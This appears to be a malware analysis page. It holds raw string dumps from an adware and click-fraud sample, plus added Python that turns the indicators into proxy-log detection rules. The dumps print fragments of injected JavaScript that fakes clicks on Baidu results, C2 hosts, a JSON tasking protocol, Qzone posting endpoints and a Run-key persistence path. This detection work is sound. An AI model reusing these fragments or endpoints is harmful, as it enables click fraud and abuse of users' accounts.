g_a=g.item(j).innerHTML.toLowerCase();
if((g.item(j).className.toLowerCase()=='g'||g.item(j).className.toLowerCase()=='c-showurl')&&g.item(j).id==''){
for (var j=0;j
function GetUrl(g){
if(!ckst){ESubmit.value = 'false';}
ckst = el.fireEvent('onmousedown',event);
var event = document.createEventObject();
if(Open){el.click && el.click();}
ckst = el.dispatchEvent(evt);
evt.initMouseEvent('mousedown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt = document.createEvent('MouseEvents');
var ESubmit = document.getElementById('su')?document.getElementById('su'):document.getElementById('su1');
accKeyboardShortcut
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
No error message is available.
An unsupported operation was attempted.
A required resource was unavailable.
Command failed.
Insufficient memory to perform operation.
System registry entries have been removed and the INI file (if any) was deleted.
Not all of the system registry entries (or INI file) were removed.
This program requires the file %s, which was not found on this system.
This program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.
Unable to read from %1, it is opened by someone else.
Unable to write to %1, it is read-only or opened by someone else.
An unexpected error occurred while reading %1.
An unexpected error occurred while writing %1.
Unable to load mail system support.
Access to %1 was denied.
An invalid file handle was associated with %1.
Seek failed on
A hardware I/O error was reported while accessing %1.
A sharing violation occurred while accessing %1.
A locking violation occurred while accessing %1.
Disk full while accessing %1.
An attempt was made to access %1 past its end.
No error occurred.
An unknown error occurred while accessing %1.
An attempt was made to write to the reading %1.
An attempt was made to access %1 past its end.
An attempt was made to read from the writing %1.
1.0.0.1
Client.exe
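The CqxpeonGez.EXE and svchost.exe:232 dumps together give the network fingerprint of this sample: two hard-coded User-Agent strings (the second, "WindowsNT5.0" without the space that genuine IE sends, is a tell in itself), the ad-tracking endpoints runpage.asp, get_ad4.asp?type=loadall and click_log2.asp?ad_url=...&cr=yes, the GetData.asp/SetData.asp pair reached with a forged Referer of www.baidu.com/s, and the hosts 121.12.115.213:1024, 121.12.170.42, 1.rwdns.com and www.it885.com.cn. The following is an added example, not part of the report: detection logic for those indicators run over a constructed proxy log (the log format and every log line are made up for the example; the indicator strings are copied from the dumps with hXXp/VVV refanged).

```python
"""Flag this sample's HTTP beacons in a proxy log (added example; log lines constructed)."""
import re
from urllib.parse import urlsplit

# Exact User-Agent strings from the string dumps above.
MALWARE_UAS = {
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)",
    "Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)",
}
# Hosts seen in the dumps (refanged).
C2_HOSTS = {"121.12.115.213:1024", "121.12.170.42", "1.rwdns.com", "www.it885.com.cn"}
# (last path component, required query fragment) built from the dump's format strings.
ENDPOINTS = [
    ("runpage.asp", "machinename="),
    ("get_ad4.asp", "type=loadall"),
    ("click_log2.asp", "ad_url="),
    ("getdata.asp", ""),
    ("setdata.asp", ""),
]

# Constructed log format: <ts> <client> <method> <url> "<referer>" "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)" "([^"]*)"$')

# Constructed sample: four beacons from the infected host 10.0.0.17, one clean line.
SAMPLE_LOG = """\
2011-09-24T15:44:31Z 10.0.0.17 GET http://121.12.115.213:1024/get_ad4.asp?type=loadall "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)"
2011-09-24T15:44:32Z 10.0.0.17 GET http://www.it885.com.cn/web/runpage.asp?id=7&machinename=LAB-XP&cr=yes "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)"
2011-09-24T15:45:02Z 10.0.0.17 POST http://1.rwdns.com/zztj/GetData.asp "http://www.baidu.com/s" "Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)"
2011-09-24T15:45:03Z 10.0.0.17 GET http://www.baidu.com/s?wd=test "http://www.baidu.com/" "Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)"
2011-09-24T15:46:00Z 10.0.0.23 GET http://www.example.com/index.html "" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"
"""


def classify(line):
    """Return the rule names one log line trips; an empty list means clean."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable"]
    _ts, _client, _method, url, referer, ua = m.groups()
    parts = urlsplit(url)
    host = parts.netloc.lower()
    path = parts.path.lower().rsplit("/", 1)[-1]
    query = parts.query.lower()
    hits = []
    if ua in MALWARE_UAS:
        hits.append("ua:hardcoded")
    if host in C2_HOSTS:
        hits.append("host:c2")
    for ep_path, ep_query in ENDPOINTS:
        if path == ep_path and ep_query in query:
            hits.append("endpoint:" + ep_path)
    # The check-in format "%s%s&machinename=%s&cr=yes" always carries both parameters.
    if "machinename=" in query and "cr=yes" in query:
        hits.append("query:machinename_cr")
    # The search-hijack component sends a Baidu search Referer to its own server.
    if referer.lower().startswith("http://www.baidu.com/s") and "baidu.com" not in host:
        hits.append("referer:forged_baidu")
    return hits


def scan_log(text):
    """Map 1-based line numbers to rule hits for every line that tripped a rule."""
    findings = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line:
            continue
        hits = classify(line)
        if hits:
            findings[lineno] = hits
    return findings


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(hits)}")
```

The UA rule fires on its own for the hijacked Baidu search (line 4 of the sample), which is the traffic the click script above generates; the host, endpoint and forged-Referer rules add confidence on the check-in and reporting requests. Adapt LINE_RE to the proxy's real format before use.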
svchost.exe_232_rwx_00400000_0004F000:
`.rsrc
Winmm.dll
DSound.dll
User32.DLL
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Referer: hXXp://VVV.baidu.com/s
Content-Type:application/x-www-form-urlencoded;
GetData.asp
SetData.asp
0.0.0.0
VVV.baidu.com/s?
window.alert = null;window.confirm = null;window.open = null;window.showModalDialog = null;
hXXp://VVV.baidu.com/s?wd=
url=url.toLowerCase();
hXXp://VVV.baidu.com/
VVV.baidu.com
hXXp://1.rwdns.com/zztj/yeshe.html
hXXp://1.rwdns.com/
ntdll.dll
kernel32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
%s.dll
CCmdTarget
COMCTL32.DLL
hhctrl.ocx
commctrl_DragListMsg
CNotSupportedException
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
MSWHEEL_ROLLMSG
user32.dll
ole32.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
OLEACC.dll
c:\Documents and Settings\Administrator\
\Suphit\Suphit6_Client\Client\Release\Client.pdb
SHELL32.dll
.?AVCCmdTarget@@
.PAVCMemoryException@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCOleDispatchException@@
.PAVCFileException@@
%System%\svchost.exe
GetCPInfo
RegOpenKeyExA
RegDeleteKeyA
RegEnumKeyA
RegOpenKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
UrlUnescapeA
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyState
HttpOpenRequestA
InternetOpenUrlA
HttpSendRequestA
HttpQueryInfoA
HttpAddRequestHeadersA
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
OLEAUT32.dll
oledlg.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WINSPOOL.DRV
WS2_32.dll
var rnd = 500 + parseInt(2000*Math.random());
if (el.value==kw){return true} else{return false}
el.click && el.click();
var el = document.getElementById('su1') ? document.getElementById('su1') : document.getElementById('su');
i = 1 + rnd; if (i>kw.length){i=kw.length};
var rnd = parseInt(2*Math.random());
if(i
var kwNode = kw.substring(0,i);
el.value=kw;
el.focus();
el.value='';
var el = document.getElementById('kw1') ? document.getElementById('kw1') : document.getElementById('kw');
el.fireEvent('onkeyup');
el.fireEvent('onkeydown');
} else if (el.fireEvent) {
el.dispatchEvent(evt);
evt.initMouseEvent('keydown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt = document.createEvent('KeyEvents');
if (document.createEvent) {
node.click && node.click();
if (node.innerHTML == '
var length = allNodes.length;
var allNodes = document.getElementsByTagName('a');
if(ESubmit.value == '
'){ESubmit.value = 'false';}
ESubmit.value = 'ok';
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,false);
if (5*Math.random()
if (g_url==url){
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,OpenSite);
ESubmit.value = IntPaimin.toString();
if (g_url==url.substring(1,21) + '...'){
if ((g_url!=null) && (g_url.length==24) && (g_url.substring(22,3)=='...')){
var g_url = GetUrl(g);
var g = content_left.childNodes.item(i).getElementsByTagName('span');
var t_a = t.item(0).getElementsByTagName('a');
if (!t.item(0)) {continue;}
var t = content_left.childNodes.item(i).getElementsByTagName('h3');
if ((content_left.childNodes.item(i).tagName.toLowerCase()!='div')||(content_left.childNodes.item(i).className.toLowerCase().indexOf('c-container')==-1)) {continue;}
for (var i=0;i
var content_left = document.getElementById('content_left');
var url='
var result = re.exec(g_a);
g_a=g_a.replace('','');
g_a=g_a.replace('','');
g_a=g.item(j).innerHTML.toLowerCase();
if((g.item(j).className.toLowerCase()=='g'||g.item(j).className.toLowerCase()=='c-showurl')&&g.item(j).id==''){
for (var j=0;j
function GetUrl(g){
if(!ckst){ESubmit.value = 'false';}
ckst = el.fireEvent('onmousedown',event);
var event = document.createEventObject();
if(Open){el.click && el.click();}
ckst = el.dispatchEvent(evt);
evt.initMouseEvent('mousedown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt = document.createEvent('MouseEvents');
var ESubmit = document.getElementById('su')?document.getElementById('su'):document.getElementById('su1');
accKeyboardShortcut
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
No error message is available.
An unsupported operation was attempted.
A required resource was unavailable.
Command failed.
Insufficient memory to perform operation.
System registry entries have been removed and the INI file (if any) was deleted.
Not all of the system registry entries (or INI file) were removed.
This program requires the file %s, which was not found on this system.
This program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.
Unable to read from %1, it is opened by someone else.
Unable to write to %1, it is read-only or opened by someone else.
An unexpected error occurred while reading %1.
An unexpected error occurred while writing %1.
Unable to load mail system support.
Access to %1 was denied.
An invalid file handle was associated with %1.
Seek failed on
A hardware I/O error was reported while accessing %1.
A sharing violation occurred while accessing %1.
A locking violation occurred while accessing %1.
Disk full while accessing %1.
An attempt was made to access %1 past its end.
No error occurred.
An unknown error occurred while accessing %1.
An attempt was made to write to the reading %1.
An attempt was made to access %1 past its end.
An attempt was made to read from the writing %1.
1.0.0.1
Client.exe
svchost.exe_992:
`.rsrc
?456789:;
!"#$%&'()* ,-./0123
inflate 1.1.3 Copyright 1995-1998 Mark Adler
ADVAPI32.dll
S2_32.dll
le32.dll
flow_apikey_xh
chrome.exe
hXXp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
{"exec":"getflows","execCount":"8","userid":"%s","userip":"%s"}
parems=%s
task_url":"
{"data":[%s],"code":"%s","src":"%s","datefirst":"%s","exec":"taskcomplete","userid":"%s","version":"%s"}
\chrome.exe
dwError: %d
%s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}
{"task_id":"%s","task_o_id":"%s","task_result":"%s","user_ip":"%s"}
hXXp://VVV.ip138.com
.tmall.com
.taobao.com
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)
{"userip":"%s","code":"%s","src":"%s","datefirst":"%s","exec":"transfer_clients","userid":"%s"}
\\.\PhysicalDrive0
iphlpapi.dll
hXXp://wangbao.6299.cc/xc.txt
sdfadfwefawCOverbearingWebAppefaefaf
CWebBrowser2
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The encoded URL is not valid.
The port number is not valid.
The requested URL is not a valid URL.
HTTP/1.1
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
hXXps://
hXXp://
Mozilla/4.0 (compatible)
error:%d
Mdd
Host: %s
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
.text
`.rdata
@.data
.rsrc
H SSh
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
GetKeyState
GetAsyncKeyState
USER32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
urlmon.dll
MSVCP60.dll
WININET.dll
WINMM.dll
VERSION.dll
IMAGEHLP.dll
TbViewer.exe
hXXp://auction1.paipai.com/
.paipai.com
hXXp://detail.tmall.com/item.htm?
hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?
hXXp://item.taobao.com/item.htm?
%d/%d
TbViewer.Document
hXXp://search1.paipai.com/cgi-bin/comm_search1?KeyWord={KEYWORD}&sDefKeyword=&sClassid=0&shoptype=&searchType=0&PTAG=20084.2.2&as=1
hXXp://s.1688.com/selloffer/offer_search.htm?keywords={KEYWORD}&n=y&categoryId=
.1688.com
hXXp://s.taobao.com/search?q={KEYWORD}&commend=all&ssid=s5-e&search_type=item&sourceId=tb.index&initiative_id=tbindexz_{YMD}
{KEYWORD}
ddd
-URL{
winmm.dll
DSound.dll
%s=%s
https
hXXp://VVV.taobao.com/webww
hXXp://amos1.taobao.com
hXXp://sighttp.qq.com
hXXp://wpa.qq.com
.gov.cn
.org.cn
.net.cn
.com.cn
!/.vv;'4FUq{}kJ#
.no\B=7wS]
InternetOpenUrlA
HttpQueryInfoA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpEndRequestA
KERNEL32.DLL
.The file (%s) aleady exists.
OverbearingWeb
OverbearingWeb 1.0
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
TbViewer.EXE
OverbearingWeb(&A)...
OverbearingWeb Microsoft
OverbearingWeb
OverbearingWeb.EXE
OverbearingWeb
svchost.exe_992_rwx_00400000_0002B000:
`.rsrc
?456789:;
!"#$%&'()* ,-./0123
inflate 1.1.3 Copyright 1995-1998 Mark Adler
ADVAPI32.dll
S2_32.dll
le32.dll
flow_apikey_xh
chrome.exe
hXXp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
{"exec":"getflows","execCount":"8","userid":"%s","userip":"%s"}
parems=%s
task_url":"
{"data":[%s],"code":"%s","src":"%s","datefirst":"%s","exec":"taskcomplete","userid":"%s","version":"%s"}
\chrome.exe
dwError: %d
%s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}
{"task_id":"%s","task_o_id":"%s","task_result":"%s","user_ip":"%s"}
hXXp://VVV.ip138.com
.tmall.com
.taobao.com
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)
{"userip":"%s","code":"%s","src":"%s","datefirst":"%s","exec":"transfer_clients","userid":"%s"}
\\.\PhysicalDrive0
iphlpapi.dll
hXXp://wangbao.6299.cc/xc.txt
sdfadfwefawCOverbearingWebAppefaefaf
CWebBrowser2
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The encoded URL is not valid.
The port number is not valid.
The requested URL is not a valid URL.
HTTP/1.1
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
hXXps://
hXXp://
Mozilla/4.0 (compatible)
error:%d
Mdd
Host: %s
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
.text
`.rdata
@.data
.rsrc
H SSh
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
GetKeyState
GetAsyncKeyState
USER32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
urlmon.dll
MSVCP60.dll
WININET.dll
WINMM.dll
VERSION.dll
IMAGEHLP.dll
TbViewer.exe
hXXp://auction1.paipai.com/
.paipai.com
hXXp://detail.tmall.com/item.htm?
hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?
hXXp://item.taobao.com/item.htm?
%d/%d
TbViewer.Document
hXXp://search1.paipai.com/cgi-bin/comm_search1?KeyWord={KEYWORD}&sDefKeyword=&sClassid=0&shoptype=&searchType=0&PTAG=20084.2.2&as=1
hXXp://s.1688.com/selloffer/offer_search.htm?keywords={KEYWORD}&n=y&categoryId=
.1688.com
hXXp://s.taobao.com/search?q={KEYWORD}&commend=all&ssid=s5-e&search_type=item&sourceId=tb.index&initiative_id=tbindexz_{YMD}
{KEYWORD}
ddd
-URL{
winmm.dll
DSound.dll
%s=%s
https
hXXp://VVV.taobao.com/webww
hXXp://amos1.taobao.com
hXXp://sighttp.qq.com
hXXp://wpa.qq.com
.gov.cn
.org.cn
.net.cn
.com.cn
!/.vv;'4FUq{}kJ#
.no\B=7wS]
InternetOpenUrlA
HttpQueryInfoA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpEndRequestA
KERNEL32.DLL
.The file (%s) aleady exists.
OverbearingWeb
OverbearingWeb 1.0
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
TbViewer.EXE
OverbearingWeb(&A)...
OverbearingWeb Microsoft
OverbearingWeb
OverbearingWeb.EXE
OverbearingWeb
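The format strings in the svchost.exe_992 dump and in its RWX region at 0x00400000 (the two lists are identical) describe a small HTTP tasking protocol: a form-encoded POST of parems=<json> to flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx with "exec":"getflows", a reply the client scans for the bare substring task_url":", a viewer command line built as %s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}, and a "taskcomplete" report. The Python below is an added example written for this page; it is not code from the sample, from the report, or from Lavasoft. It turns those strings into detection helpers and runs them over constructed inputs. The host, path, exec verbs, retail domain suffixes and the task_url marker are taken from the dump; the proxy log format, the outer layout of the sample reply, the sample command line, and the function names are assumptions, and the meaning of the NAV/STY/PXY fields is not given by the dump, so they are carried as opaque values.

```python
# Added example for this report page; not code from the sample or from Lavasoft.
# Every literal below comes from the svchost.exe_992 strings except the sample
# inputs, which are constructed, and the outer layout of SAMPLE_REPLY, which is
# an assumption (the dump only shows the  task_url":"  marker).
import json
import re
from urllib.parse import quote_plus, unquote_plus

C2_HOST = "flow3002.6299.cc"                 # from hXXp://flow3002.6299.cc/...
C2_PATH = "/ClientAPI/flowtaskAPI.aspx"
EXEC_VERBS = {"getflows", "taskcomplete", "transfer_clients"}   # "exec" values
TASK_DOMAINS = (".taobao.com", ".tmall.com", ".paipai.com", ".1688.com")

# %s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}
VIEWER_RE = re.compile(
    r"-URL\{(?P<url>[^}]*)\}\s+-REF\{(?P<ref>[^}]*)\}\s+-NAV\{(?P<nav>-?\d+)\}"
    r"\s+-STY\{(?P<sty>-?\d+)\}\s+-PXY\{(?P<pxy>[^}]*)\}")
# the binary carries the bare substring  task_url":"  so it scans for it rather
# than parsing the reply as JSON; mirror that so odd replies are not missed
TASK_URL_RE = re.compile(r'task_url":"([^"]*)"')


def parse_checkin(body):
    """Decode a 'parems=<url-encoded json>' POST body.
    Returns the dict, or None if it is not one of the exec verbs in the dump."""
    if not body.startswith("parems="):
        return None
    try:
        data = json.loads(unquote_plus(body[len("parems="):]))
    except ValueError:
        return None
    if not isinstance(data, dict) or data.get("exec") not in EXEC_VERBS:
        return None
    return data


def extract_task_urls(reply):
    """All task_url values in a server reply, in order."""
    return TASK_URL_RE.findall(reply)


def parse_viewer_cmdline(cmdline):
    """Split a -URL{}/-REF{}/-NAV{}/-STY{}/-PXY{} command line into fields and
    mark whether the URL points at one of the retail domains from the dump.
    NAV/STY/PXY are carried as opaque values; their meaning is not in the dump."""
    m = VIEWER_RE.search(cmdline)
    if not m:
        return None
    f = m.groupdict()
    f["nav"], f["sty"] = int(f["nav"]), int(f["sty"])
    host = re.sub(r"^https?://", "", f["url"], flags=re.I).split("/")[0].lower()
    f["retail_target"] = any(host.endswith(d) for d in TASK_DOMAINS)
    return f


def scan_proxy_log(lines):
    """Flag lines of the constructed form '<ts> <client> POST <host> <path> <body>'
    that post a valid check-in to the flowtaskAPI endpoint."""
    hits = []
    for line in lines:
        parts = line.split(None, 5)
        if len(parts) < 6 or parts[2] != "POST":
            continue
        ts, client, _, host, path, body = parts
        if host.lower() != C2_HOST or not path.startswith(C2_PATH):
            continue
        data = parse_checkin(body)
        if data is None:
            continue
        hits.append({"ts": ts, "client": client, "exec": data["exec"],
                     "userid": data.get("userid"), "userip": data.get("userip")})
    return hits


# --- constructed sample input (not from the report) -------------------------
CHECKIN = json.dumps({"exec": "getflows", "execCount": "8",
                      "userid": "A1B2C3", "userip": "203.0.113.7"})
SAMPLE_LOG = [
    "2011-09-24T15:44:20 10.0.0.5 POST flow3002.6299.cc /ClientAPI/flowtaskAPI.aspx parems="
    + quote_plus(CHECKIN),
    "2011-09-24T15:44:21 10.0.0.5 GET www.ip138.com / -",
    "2011-09-24T15:44:25 10.0.0.5 POST flow3002.6299.cc /ClientAPI/flowtaskAPI.aspx parems="
    + quote_plus(json.dumps({"exec": "taskcomplete", "userid": "A1B2C3"})),
    "2011-09-24T15:44:30 10.0.0.9 POST example.org /login parems=" + quote_plus(CHECKIN),
]
SAMPLE_REPLY = ('{"code":"0","flows":[{"task_id":"77","task_url":"http://s.taobao.com/search?q=test"},'
                '{"task_id":"78","task_url":"http://detail.tmall.com/item.htm?id=1"}]}')
SAMPLE_CMDLINE = ('TbViewer.exe -URL{http://s.taobao.com/search?q=test} '
                  '-REF{http://www.baidu.com} -NAV{3} -STY{1} -PXY{}')

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print("check-in", hit)
    print("tasked URLs", extract_task_urls(SAMPLE_REPLY))
    print("viewer args", parse_viewer_cmdline(SAMPLE_CMDLINE))
```

scan_proxy_log keys on host, path, the parems= prefix and a known exec verb together, so a stray POST to the same path with a malformed body is not reported; parse_viewer_cmdline is meant for process-creation events where the -URL{ marker (also present as a bare string in the dump) identifies the viewer launch.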
RhdmcnkZlr.EXE_1560:
.text
`.data
.rsrc
MSVBVM60.DLL
#vb6chs.dll
shdocvw.dll
SHDocVwCtl.WebBrowser
WebBrowser
msscript.ocx
MSScriptControlCtl.ScriptControl
%Program Files%\VB
\VB6.OLB
%System%\ieframe.oca
%System%\msscript.oca
%System%\mshtml.tlb
wininet.dll
shell32.dll
UTF8_UrlDecode
VBA6.DLL
dMÂL
hXXp://120.24.81.202/pz.txt
hXXp://120.24.81.202/pz.html
for(var i = 0, len = str.length; i
hash = (hash
hXXp://VVV.baidu.com
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252Fmy.qzone.qq.com/?via=QQCLIENT.MAINPANEL.APPSTORE&ptlang=2052&css=&mibao_css=&low_login=0&ptui_version=10031
loginbtn
skey=
hXXp://VVV.8kuaiyou.com
hXXp://open.qzone.qq.com/doLike?g_tk=
qzreferrer=http://user.qzone.qq.com/
/&url=http://user.qzone.qq.com/
hXXp://my.qzone.qq.com/app/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://b1.cnc.qzone.qq.com/cgi-bin/blognew/quote_blog?g_tk=
qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
&blogid=
_100.png
&type=4&url=hXXp://my.qzone.qq.com/app/
&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15&timestamp=1401962985&dprefix=&blogseed=0.3268083375878632&inCharset=utf-8&outCharset=utf-8&ref=qzone&entertime=1401962991240&ptlang=2052&uin=
&cateName=个人日记&rightType=1&force=0&source=34&iNotice=1&inCharset=gbk&outCharset=gbk&format=fs&ref=qzone&json=1&g_tk=
&secverifykey=28Q1206
hXXp://appsupport.qq.com/cgi-bin/qzapps/userapp_addapp.cgi?g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=
&pics=hXXp://i.gtimg.cn/open/app_icon/
.html?via=APPCANVAS.ASSISTANT_SHARE&qzreferrer=hXXp://my.qzone.qq.com/app/
.html?via=PORTALSTORE.XX.HOME-FRIENDUSED.SEQ3_100141_2&appid=
.html?via=PORTALSTORE.XX.HOME-APPWALL
MSXML2.XMLHTTP
WinHttp.WinHttpRequest.5.1
Mozilla/6.0
application/x-www-form-urlencoded
hXXp://my.qzone.qq.com/app
%Documents and Settings%
windows xp
c:\windows\ime\appfht.exe
WScript.Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
app.exe